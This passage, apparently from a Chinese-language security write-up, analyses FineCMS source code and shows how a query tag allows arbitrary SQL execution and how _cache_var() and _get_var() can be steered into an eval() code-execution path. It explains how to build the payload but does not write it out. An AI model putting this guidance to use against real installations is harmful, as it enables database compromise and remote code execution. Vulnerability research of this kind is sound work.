                    return $this->_return($system['return'], '没有查询到内容', $sql, 0);
                }
                $sql.= ' LIMIT '.$pagesize * ($page - 1).','.$pagesize;
                $pages = $this->_get_pagination(str_replace('[page]', '{page}', urldecode($system['urlrule'])), $pagesize, $total);
            }

            $data = $this->_query($sql, $system['site'], $system['cache']);
            $fields = NULL;

            if ($system['module']) {
                $fields = $this->ci->module[$system['module']]['field']; // 模型主表的字段
            }

            if ($fields) {
                // 缓存查询结果
                $name = 'list-action-sql-'.md5($sql);
                $cache = $this->ci->get_cache_data($name);
                if (!$cache && is_array($data)) {
                    // 模型表的系统字段
                    $fields['inputtime'] = array('fieldtype' => 'Date');
                    $fields['updatetime'] = array('fieldtype' => 'Date');
                    // 格式化显示自定义字段内容
                    foreach ($data as $i => $t) {
                        $data[$i] = $this->ci->field_format_value($fields, $t, 1);
                    }
                    //$cache = $this->ci->set_cache_data($name, $data, $system['cache']);
                    $cache = $system['cache'] ? $this->ci->set_cache_data($name, $data, $system['cache']) : $data;
                }
                $data = $cache;
            }
            return $this->_return($system['return'], $data, $sql, $total, $pages, $pagesize);
        } else {
            return $this->_return($system['return'], '参数不正确，SQL语句必须用单引号包起来'); // 没有查询到内容
        }
        break;

    ...
}

任意SQL语句执行到这里就不用说了。

再说一下代码执行的构造

只需使$cache有返回值就可以执行eval()了了，看一下_cache_var()函数：

public function _cache_var($name, $site = SITE_ID) {

    $data = NULL;
    $name = strtoupper($name);

    switch ($name) {
        case 'MEMBER':
            $data = $this->ci->get_cache('member');
            break;
        case 'URLRULE':
            $data = $this->ci->get_cache('urlrule');
            break;
        case 'MODULE':
            $data = $this->ci->get_cache('module');
            break;
        case 'CATEGORY':
            $site = $site ? $site : SITE_ID;
            $data = $this->ci->get_cache('category-'.$site);
            break;
        default:
            $data = $this->ci->get_cache($name.'-'.$site);
            break;
    }

    return $data;
}

只需name等于其中的几个值就可以，接下来就是根据_get_var()函数构造payload了：

public function _get_var($param){

    $array = explode('.', $param);
    if (!$array) {
        return '';
    }

    $string = '';
    foreach ($array as $var) {
        $string.= '[';
        if (strpos($var, '$') === 0) {
            $string.= preg_replace('/\[(.+)\]/U', '[\'\\1\']', $var);
        } elseif (preg_match('/[A-Z_]+/', $var)) {
            $string.= ''.$var.'';
        } else {
            $string.= '\''.$var.'\'';
        }
        $string.= ']';
    }

    return $string;
}

就两个正则，稍微构造下就OK了

0x3 其他

另外这个地方，利用任意SQL语句返回$data也能造成代码执行，不分析了。

听说finecms都能申请cve了，早没看，简直是程序员开发出来给刷cve的==、

自评TCV=1